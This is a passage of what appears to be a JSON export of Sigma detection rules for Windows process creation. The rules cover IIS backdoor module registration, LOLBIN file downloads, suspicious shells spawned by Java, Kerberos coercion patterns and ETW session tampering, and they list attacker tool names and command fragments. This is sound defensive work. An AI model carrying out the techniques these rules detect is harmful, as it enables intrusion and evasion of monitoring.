'pwsh.dll'\n    selection_cli_del:\n        CommandLine|contains:\n            - 'del '\n            - 'erase '\n            - 'rm '\n            - 'remove-item '\n            - 'rmdir '\n    selection_cli_iis_dir:\n        CommandLine|contains: '\\inetpub\\logs\\'\n    condition: all of selection_*\nfalsepositives:\n    - Deletion of IIS logs that are older than a certain retention period as part of regular maintenance activities.\n    - Legitimate schedule tasks or scripts that clean up log files regularly.\n    # More Fp cases\n    # https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/managing-iis-log-file-storage#02\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_iis_susp_module_registration.yml",
    "content": "title: Suspicious IIS Module Registration\nid: 043c4b8b-3a54-4780-9682-081cb6b8185c\nstatus: test\ndescription: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors\nreferences:\n    - https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/\nauthor: Florian Roth (Nextron Systems), Microsoft (idea)\ndate: 2022-08-04\nmodified: 2023-01-23\ntags:\n    - attack.persistence\n    - attack.t1505.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\w3wp.exe'\n    selection_cli_1:\n        CommandLine|contains: 'appcmd.exe add module'\n    selection_cli_2:\n        CommandLine|contains: ' system.enterpriseservices.internal.publish'\n        Image|endswith: '\\powershell.exe'\n    selection_cli_3:\n        CommandLine|contains|all:\n            - 'gacutil'\n            - ' /I'\n    condition: selection_parent and 1 of selection_cli_*\nfalsepositives:\n    - Administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ilasm_il_code_compilation.yml",
    "content": "title: C# IL Code Compilation Via Ilasm.EXE\nid: 850d55f9-6eeb-4492-ad69-a72338f65ba4\nstatus: test\ndescription: Detects the use of \"Ilasm.EXE\" in order to compile C# intermediate (IL) code to EXE or DLL.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Ilasm/\n    - https://www.echotrail.io/insights/search/ilasm.exe\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-05-07\nmodified: 2022-05-16\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\ilasm.exe'\n        - OriginalFileName: 'ilasm.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' /dll'\n            - ' /exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml",
    "content": "title: ImagingDevices Unusual Parent/Child Processes\nid: f11f2808-adb4-46c0-802a-8660db50fa99\nstatus: test\ndescription: Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity\nreferences:\n    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-27\nmodified: 2022-12-29\ntags:\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            # Add more if known\n            - \\WmiPrvSE.exe\n            - \\svchost.exe\n            - \\dllhost.exe\n        Image|endswith: '\\ImagingDevices.exe'\n    selection_child:\n        # You can add specific suspicious child processes (such as cmd, powershell...) to increase the accuracy\n        ParentImage|endswith: '\\ImagingDevices.exe'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_imewbdld_download.yml",
    "content": "title: Arbitrary File Download Via IMEWDBLD.EXE\nid: 863218bd-c7d0-4c52-80cd-0a96c09f54af\nrelated:\n    - id: 8d7e392e-9b28-49e1-831d-5949c6281228\n      type: derived\nstatus: test\ndescription: Detects usage of \"IMEWDBLD.exe\" to download arbitrary files\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download\n    - https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\IMEWDBLD.exe'\n        - OriginalFileName: 'imewdbld.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\n# Note: Please reduce this to medium if you find legitimate use case of this utility with a URL\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml",
    "content": "title: InfDefaultInstall.exe .inf Execution\nid: ce7cf472-6fcc-490a-9481-3786840b5d9b\nstatus: test\ndescription: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution\n    - https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/\nauthor: frack113\ndate: 2021-07-13\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'InfDefaultInstall.exe '\n            - '.inf'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_installutil_download.yml",
    "content": "title: File Download Via InstallUtil.EXE\nid: 75edd216-1939-4c73-8d61-7f3a0d85b5cc\nstatus: test\ndescription: |\n    Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to \"%LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\\"\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/239\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\InstallUtil.exe'\n        - OriginalFileName: 'InstallUtil.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'ftp://'\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml",
    "content": "title: Suspicious Execution of InstallUtil Without Log\nid: d042284c-a296-4988-9be5-f424fadcc28c\nstatus: test\ndescription: Uses the .NET InstallUtil.exe application in order to execute image without log\nreferences:\n    - https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/\n    - https://learn.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool\nauthor: frack113\ndate: 2022-01-23\nmodified: 2022-02-04\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\InstallUtil.exe'\n        Image|contains: 'Microsoft.NET\\Framework'\n        CommandLine|contains|all:\n            - '/logfile= '\n            - '/LogToConsole=false'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_java_keytool_susp_child_process.yml",
    "content": "title: Suspicious Shells Spawn by Java Utility Keytool\nid: 90fb5e62-ca1f-4e22-b42e-cc521874c938\nstatus: test\ndescription: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)\nreferences:\n    - https://redcanary.com/blog/intelligence-insights-december-2021\n    - https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html\nauthor: Andreas Hunkeler (@Karneades)\ndate: 2021-12-22\nmodified: 2023-01-21\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\keytool.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\sh.exe'\n            - '\\bash.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\schtasks.exe'\n            - '\\certutil.exe'\n            - '\\whoami.exe'\n            - '\\bitsadmin.exe'\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n            - '\\scrcons.exe'\n            - '\\regsvr32.exe'\n            - '\\hh.exe'\n            - '\\wmic.exe'\n            - '\\mshta.exe'\n            - '\\rundll32.exe'\n            - '\\forfiles.exe'\n            - '\\scriptrunner.exe'\n            - '\\mftrace.exe'\n            - '\\AppVLP.exe'\n            - '\\systeminfo.exe'\n            - '\\reg.exe'\n            - '\\query.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml",
    "content": "title: Suspicious Child Process Of Manage Engine ServiceDesk\nid: cea2b7ea-792b-405f-95a1-b903ea06458f\nstatus: test\ndescription: Detects suspicious child processes of the \"Manage Engine ServiceDesk Plus\" Java web service\nreferences:\n    - https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/\n    - https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py\n    - https://blog.viettelcybersecurity.com/saml-show-stopper/\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-01-18\nmodified: 2023-08-29\ntags:\n    - attack.command-and-control\n    - attack.t1102\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|contains|all:\n            - '\\ManageEngine\\ServiceDesk\\'\n            - '\\java.exe'\n        Image|endswith:\n            - '\\AppVLP.exe'\n            - '\\bash.exe'\n            - '\\bitsadmin.exe'\n            - '\\calc.exe'\n            - '\\certutil.exe'\n            - '\\cscript.exe'\n            - '\\curl.exe'\n            - '\\forfiles.exe'\n            - '\\mftrace.exe'\n            - '\\mshta.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\notepad.exe'  # Often used in POCs\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\query.exe'\n            - '\\reg.exe'\n            - '\\schtasks.exe'\n            - '\\scrcons.exe'\n            - '\\sh.exe'\n            - '\\systeminfo.exe'\n            - '\\whoami.exe'  # Often used in POCs\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n            # - '\\hh.exe'\n            # - '\\regsvr32.exe'\n            # - '\\rundll32.exe'\n            # - '\\scriptrunner.exe'\n    filter_main_net:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n        CommandLine|contains: ' stop'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate sub processes started by Manage Engine ServiceDesk Pro\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_java_remote_debugging.yml",
    "content": "title: Java Running with Remote Debugging\nid: 8f88e3f6-2a49-48f5-a5c4-2f7eedf78710\nstatus: test\ndescription: Detects a JAVA process running with remote debugging allowing more than just localhost to connect\nreferences:\n    - https://dzone.com/articles/remote-debugging-java-applications-with-jdwp\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-01-16\nmodified: 2023-02-01\ntags:\n    - attack.t1203\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_jdwp_transport:\n        CommandLine|contains: 'transport=dt_socket,address='\n    selection_old_jvm_version:\n        CommandLine|contains:\n            - 'jre1.'\n            - 'jdk1.'\n    exclusion:\n        CommandLine|contains:\n            - 'address=127.0.0.1'\n            - 'address=localhost'\n    condition: all of selection_* and not exclusion\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_java_susp_child_process.yml",
    "content": "title: Suspicious Processes Spawned by Java.EXE\nid: 0d34ed8b-1c12-4ff2-828c-16fc860b766d\nrelated:\n    - id: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0\n      type: similar\nstatus: test\ndescription: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)\nreferences:\n    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/\nauthor: Andreas Hunkeler (@Karneades), Florian Roth\ndate: 2021-12-17\nmodified: 2024-01-18\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\java.exe'\n        Image|endswith:\n            - '\\AppVLP.exe'\n            - '\\bitsadmin.exe'\n            - '\\certutil.exe'\n            - '\\cscript.exe'\n            - '\\curl.exe'\n            - '\\forfiles.exe'\n            - '\\hh.exe'\n            - '\\mftrace.exe'\n            - '\\mshta.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\query.exe'\n            - '\\reg.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\schtasks.exe'\n            - '\\scrcons.exe'\n            - '\\scriptrunner.exe'\n            - '\\sh.exe'\n            - '\\systeminfo.exe'\n            - '\\whoami.exe'\n            - '\\wmic.exe'        # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/\n            - '\\wscript.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate calls to system binaries\n    - Company specific internal usage\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_java_susp_child_process_2.yml",
    "content": "title: Shell Process Spawned by Java.EXE\nid: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0\nrelated:\n    - id: 0d34ed8b-1c12-4ff2-828c-16fc860b766d\n      type: similar\nstatus: test\ndescription: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)\nreferences:\n    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/\nauthor: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali\ndate: 2021-12-17\nmodified: 2024-01-18\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\java.exe'\n        Image|endswith:\n            - '\\bash.exe'\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    filter_main_build:\n        ParentImage|contains: 'build'  # excluding CI build agents\n        CommandLine|contains: 'build'  # excluding CI build agents\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate calls to system binaries\n    - Company specific internal usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml",
    "content": "title: Suspicious SysAidServer Child\nid: 60bfeac3-0d35-4302-8efb-1dd16f715bc6\nstatus: test\ndescription: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)\nreferences:\n    - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-26\ntags:\n    - attack.lateral-movement\n    - attack.t1210\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\java.exe'\n            - '\\javaw.exe'\n        ParentCommandLine|contains: 'SysAidServer'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_jsc_execution.yml",
    "content": "title: JScript Compiler Execution\nid: 52788a70-f1da-40dd-8fbd-73b5865d6568\nstatus: test\ndescription: |\n    Detects the execution of the \"jsc.exe\" (JScript Compiler).\n    Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Jsc/\n    - https://www.phpied.com/make-your-javascript-a-windows-exe/\n    - https://twitter.com/DissectMalware/status/998797808907046913\nauthor: frack113\ndate: 2022-05-02\nmodified: 2024-04-24\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        - Image|endswith: '\\jsc.exe'\n        - OriginalFileName: 'jsc.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use to compile JScript by developers.\n# Note: Can be decreased to informational or increased to medium depending on how this utility is used.\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_kavremover_uncommon_execution.yml",
    "content": "title: Kavremover Dropped Binary LOLBIN Usage\nid: d047726b-c71c-4048-a99b-2e2f50dc107d\nstatus: test\ndescription: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.\nreferences:\n    - https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-01\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains: ' run run-cmd '\n    filter_main_legit_parents:\n        ParentImage|endswith:\n            - '\\cleanapi.exe' # When launched from KES installer\n            - '\\kavremover.exe' # When launched from kavremover.exe\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_kd_execution.yml",
    "content": "title: Windows Kernel Debugger Execution\nid: 27ee9438-90dc-4bef-904b-d3ef927f5e7e\nstatus: test\ndescription: Detects execution of the Windows Kernel Debugger \"kd.exe\".\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\nmodified: 2024-04-24\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\kd.exe'\n        - OriginalFileName: 'kd.exe'\n    condition: selection\nfalsepositives:\n    - Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_kerberos_coercion_via_dns_spn_spoofing.yml",
    "content": "title: Attempts of Kerberos Coercion Via DNS SPN Spoofing\nid: 0ed99dda-6a35-11ef-8c99-0242ac120002\nrelated:\n    - id: b07e58cf-cacc-4135-8473-ccb2eba63dd2\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the presence of \"UWhRC....AAYBAAAA\" pattern in command line.\n    The pattern \"1UWhRCAAAAA..BAAAA\" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.\n    Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.\n    It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records\n    to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.\n    If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,\n    or checking for the presence of such records through the `nslookup` command.\nreferences:\n    - https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025\n    - https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-20\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1557.001\n    - attack.t1187\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'UWhRCA'\n            - 'BAAAA'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_keyscrambler_susp_child_process.yml",
    "content": "title: Potentially Suspicious Child Process of KeyScrambler.exe\nid: ca5583e9-8f80-46ac-ab91-7f314d13b984\nrelated:\n    - id: d2451be2-b582-4e15-8701-4196ac180260\n      type: similar\nstatus: test\ndescription: Detects potentially suspicious child processes of KeyScrambler.exe\nreferences:\n    - https://twitter.com/DTCERT/status/1712785421845790799\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-05-13\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1203\n    - attack.t1574.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\KeyScrambler.exe'\n    selection_binaries:\n        # Note: add additional binaries that the attacker might use\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'cscript.exe'\n              - 'mshta.exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'regsvr32.exe'\n              - 'RUNDLL32.EXE'\n              - 'wscript.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ksetup_password_change_computer.yml",
    "content": "title: Computer Password Change Via Ksetup.EXE\nid: de16d92c-c446-4d53-8938-10aeef41c8b6\nstatus: test\ndescription: Detects password change for the computer's domain account or host principal via \"ksetup.exe\"\nreferences:\n    - https://twitter.com/Oddvarmoe/status/1641712700605513729\n    - https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-06\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\ksetup.exe'\n        - OriginalFileName: 'ksetup.exe'\n    selection_cli:\n        CommandLine|contains: ' /setcomputerpassword '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ksetup_password_change_user.yml",
    "content": "title: Logged-On User Password Change Via Ksetup.EXE\nid: c9783e20-4793-4164-ba96-d9ee483992c4\nstatus: test\ndescription: Detects password change for the logged-on user's via \"ksetup.exe\"\nreferences:\n    - https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-06\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\ksetup.exe'\n        - OriginalFileName: 'ksetup.exe'\n    selection_cli:\n        CommandLine|contains: ' /ChangePassword '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ldifde_export.yml",
    "content": "title: Active Directory Structure Export Via Ldifde.EXE\nid: 4f7a6757-ff79-46db-9687-66501a02d9ec\nstatus: test\ndescription: Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.\nreferences:\n    - https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit\n    - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-14\ntags:\n    - attack.exfiltration\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_ldif:\n        - Image|endswith: '\\ldifde.exe'\n        - OriginalFileName: 'ldifde.exe'\n    selection_cmd:\n        CommandLine|contains: '-f'\n    filter_import:\n        CommandLine|contains: ' -i'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml",
    "content": "title: Import LDAP Data Interchange Format File Via Ldifde.EXE\nid: 6f535e01-ca1f-40be-ab8d-45b19c0c8b7f\nstatus: test\ndescription: |\n    Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\nreferences:\n    - https://twitter.com/0gtweet/status/1564968845726580736\n    - https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)\nauthor: '@gott_cyber'\ndate: 2022-09-02\nmodified: 2023-03-14\ntags:\n    - attack.command-and-control\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\ldifde.exe'\n        - OriginalFileName: 'ldifde.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '-i'\n            - '-f'\n    condition: all of selection_*\nfalsepositives:\n    - Since the content of the files are unknown, false positives are expected\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_link_uncommon_parent_process.yml",
    "content": "title: Uncommon Link.EXE Parent Process\nid: 6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6\nstatus: test\ndescription: |\n    Detects an uncommon parent process of \"LINK.EXE\".\n    Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation.\n    Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the \"LINK.EXE\" binary without checking its validity.\n    This would allow an attacker to sideload any binary with the name \"link.exe\" if one of the aforementioned tools get executed from a different location.\n    By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious.\nreferences:\n    - https://twitter.com/0gtweet/status/1560732860935729152\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-22\nmodified: 2024-06-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\link.exe'\n        CommandLine|contains: 'LINK /' # Hardcoded command line when we call tools like dumpbin.exe, editbin.exe, lib.exe...etc\n    # Add other filters for other legitimate locations\n    filter_main_visual_studio:\n        ParentImage|startswith:\n            - 'C:\\Program Files\\Microsoft Visual Studio\\'\n            - 'C:\\Program Files (x86)\\Microsoft Visual Studio\\'\n        ParentImage|contains:\n            - '\\VC\\bin\\'\n            - '\\VC\\Tools\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml",
    "content": "title: Rebuild Performance Counter Values Via Lodctr.EXE\nid: cc9d3712-6310-4320-b2df-7cb408274d53\nstatus: test\ndescription: Detects the execution of \"lodctr.exe\" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-15\nmodified: 2024-03-05\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\lodctr.exe'\n        OriginalFileName: 'LODCTR.EXE'\n    selection_cli:\n        CommandLine|contains|windash: ' -r'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage by an administrator\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_logman_disable_eventlog.yml",
    "content": "title: Suspicious Windows Trace ETW Session Tamper Via Logman.EXE\nid: cd1f961e-0b96-436b-b7c6-38da4583ec00\nstatus: test\ndescription: Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions\nreferences:\n    - https://twitter.com/0gtweet/status/1359039665232306183?s=21\n    - https://ss64.com/nt/logman.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-02-11\nmodified: 2023-02-21\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.t1070.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\logman.exe'\n        - OriginalFileName: 'Logman.exe'\n    selection_action:\n        CommandLine|contains:\n            - 'stop '\n            - 'delete '\n    selection_service:\n        CommandLine|contains:\n            - 'Circular Kernel Context Logger'\n            - 'EventLog-' # Cover multiple traces starting with EventLog-*\n            - 'SYSMON TRACE'\n            - 'SysmonDnsEtwSession'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate deactivation by administrative staff\n    - Installer tools that disable services, e.g. before log collection agent installation\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml",
